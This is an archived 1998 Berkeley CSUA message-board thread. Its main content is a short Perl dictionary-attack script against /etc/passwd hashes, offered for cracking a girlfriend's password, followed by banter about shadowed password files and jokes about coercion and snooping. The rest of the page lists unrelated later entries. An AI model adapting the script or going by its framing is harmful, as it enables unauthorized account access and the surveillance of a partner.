Entry 14648 (Berkeley CSUA MOTD)

Berkeley CSUA MOTD:Entry 14648

WIKI \| FAQ \| Tech FAQ
`http://csua.com/feed/`

2024/11/23 [General] UID:1000 Activity:popular

11/23

1998/9/22-23 [Computer/SW/Security, Computer/SW/OS/FreeBSD, Computer/SW/Unix] UID:14648 Activity:high

9/22    look what i wrote. have fun cracking your wanabee gf's password!
        \_ and getting kicked off of soda
        \_ This assumes that you have a user readable passwd file.
            \_ or non-shadowed passwd, like soda's
                        \_ /etc/passwd must be world readable, so the

#!/usr/bin/perl

$twink = $ARGV[0];

open(PASSWD,"/etc/passwd");
do {
  $line = <PASSWD>;
  ($user,$passwd) = split(/:/,$line);
} while ($twink ne $user);
close(PASSWD);
$salt = substr($passwd,0,2);
$passwd = substr($passwd,2,);

foreach $attempt (`cat /usr/dict/words`) {
  chop($attempt);
  if($salt.$passwd eq crypt($attempt,$salt)) {
    print "password is: $attempt\n";
    exit(1);
  }
}
print "Unable to crack password\n";
                           "user readable passwd" implies non shadowed
               \_ soda has a shadowed passwd file.  all 4.4 bsd derivatives
                  have such a mechanism.  most modern unix like os's do.
                  only older's like ultrix, older irix, <= 4.3 bsd derivs
                        \_ even ultrix has shadowed passwds
                           \_ I am not sure if I would call that
                              monstrosity a passwd file, but okayn in that
                              case, I amend my earlier statement to include
                              ultrix and sunos as shadowable --jon
                \_where does soda keep its shadow passwd's?
                        \_ where no one but the people with enough clue
                           to RTFM can find them
        \_ Alec Muffett >> you
        \_ /usr/dict/words is a lame dictionary - real crackers use much
                much larger dictionaries
           \_ Real crackers kidnap the person, tie him/her up, and beat
              the shit out of him/her until (s)he gives you the password
                \_ REAL crackers get root shell...
                   \_ True crackers don't bother with gf's account. They
                      sift through her lingerie drawer for a diary
                      (amongst other items...)
                        \_ CSUA crackers sift through her lingerie drawer
                           and wear it.
                                \_ Free Kevin Mitnick!

ERROR, url_link recursive (eces.Colorado.EDU/secure/mindterm2) 2024/11/23 [General] UID:1000 Activity:popular

11/23

You may also be interested in these entries...

2012/8/26-11/7 [Computer/SW/Security] UID:54465 Activity:nil

8/26    Poll: how many of you pub/priv key users: 1) use private keys that
        are not password protected 2) password protect your private keys
        but don't use ssh-agent 3) use ssh-agent:
        1) .
        2) ..
        3) ...
	...

2012/8/29-11/7 [Computer/SW/Security] UID:54467 Activity:nil

8/29    There was once a CSUA web page which runs an SSH client for logging
        on to soda.  Does that page still exist?  Can someone remind me of the
        URL please?  Thx.
        \_ what do you mean? instruction on how to ssh into soda?
           \_ No I think he means the ssh applet, which, iirc, was an applet
              that implemented an ssh v1 client.  I think this page went away
	...

2012/9/20-11/7 [Computer/SW/Unix, Finance/Investment] UID:54482 Activity:nil

9/20    How do I change my shell? chsh says "Cannot change ID to root."
        \_ /usr/bin/chsh does not have the SUID permission set. Without
           being set, it does not successfully change a user's shell.
           Typical newbie sys admin (on soda)
           \_ Actually, it does: -rwsr-xr-x 1 root root 37552 Feb 15  2011 /usr/bin/chsh
	...

2012/5/8-6/4 [Computer/SW/Unix] UID:54383 Activity:nil

5/8     Hello everyone!  This is Josh Hawn, CSUA Tech VP for Spring 2012.
        About 2 weeks ago, someone brought to my attention that our script
        to periodically merge /etc/motd.public into /etc/motd wasn't
        running.  When I looked into it, the cron daemon was running, but
        there hadn't been any root activity in the log since April 7th.  I
        looked into it for a while, but got lost in other things I was
	...

2012/2/9-3/26 [Computer/SW/Security, Computer/SW/Unix] UID:54305 Activity:nil

2/9     Reminder: support for mail services has been deprecated for *several
        years*. Mail forwarding, specifically .forward mail forwarding, is
        officially supported and was never deprecated.
        \_ There is no .forward under ~root.  How do we mail root and how do
           we get responses?
           \_ root@csua.berkeley.edu is and always has been an alias.
	...

2011/9/14-12/28 [Computer/SW/Unix] UID:54172 Activity:nil

9/12    We've restored CSUA NFS to something vaguely resembling normal
        functionality -- plus, with some luck, we should now have something
        vaguely resembling normal uptime, too!  Ping root@csua.org if you
        notice any problems.  --jordan
--------------------------------------------------------------------------------
        \_  Oh, and http://irc.CSUA.Berkeley.EDU is online again.
	...

2011/6/5-8/27 [Computer/HW/Memory] UID:54127 Activity:nil

6/5     In an effort to stabilize our services, we'll be rebuilding parts of
        the CSUA infrastructure over the course of this summer.  To give us
        some wiggle room, I've temporarily decreased soda's allocated RAM from
        8GB to 2GB.  If you need to run something that requires large amounts
        of memory, please send mail to root@csua.org and we'll try to
        accommodate your request.  --jordan
	...

2011/4/27-7/30 [Computer/SW/Security, Computer/SW/Unix] UID:54096 Activity:nil

4/28    Will wall be fixed?   - jsl
        \_ What's wall?
           \_ An anachronism from a bygone era, when computers were hard to
              comeby, the dorms didn't have net, there was no airbears, and
              when phones didn't come standard with twitter or sms.
           \_ A non useful implementation of twitter.
	...

2011/5/19-7/30 [Computer/SW/Security] UID:54110 Activity:nil

5/19    Uh, is anyone still using this? Please mark here if you post and
        haven't added this yet. I'll start:
        \_ person k
        \_ ausman, I check in about once a week.
        \_ erikred, twice a week or so.
        \_ mehlhaff, I login when I actually own my home directory instead of
	...

2010/12/13-2011/2/19 [Computer/SW/Unix] UID:53978 Activity:nil

12/21   Help, all my files are owned by nobody! -ausman
        (yes I emailed root)
        \_ Things should be fine now. As usual, the NFS server caused a cascade
           of errors.
	...

2012/3/29-6/4 [Computer/HW/Memory, Computer/HW/CPU, Computer/HW/Drives] UID:54351 Activity:nil

3/29    A friend wants a PC (no mac). She doesn't want Dell. Is there a
        good place that can custom build for you (SSD, large RAM, cheap video
        card--no game)?
        \_ As a side note: back in my Cal days more than two decades ago when
           having a 387SX made me the only person with floating-point hardware,
           most machines were custom built.
	...

2012/1/27-3/26 [Computer/SW/Unix] UID:54299 Activity:nil

1/27    Interesting list of useful unix tools. Shout out to
        cowsay even!
        http://www.stumbleupon.com/su/3428AB/kkovacs.eu/cool-but-obscure-unix-tools
        \_ This is nice.  Thanks.
	...

2011/10/26-12/6 [Computer/SW/Unix] UID:54202 Activity:nil

10/24  What's an easy way to see if say column 3 of a file matches a list of
       expressions in a file? Basically I want to combine "grep -f <file>"
       to store the patterns and awk's $3 ~ /(AAA|BBB|CCC)/ ... I realize
       I can do this with "egrep -f " and use regexp instead of strings, but
       was wondering if there was some magic way to do this.
       \_ UNIX has no magic. Make a shell script to produce the ask or egrep
	...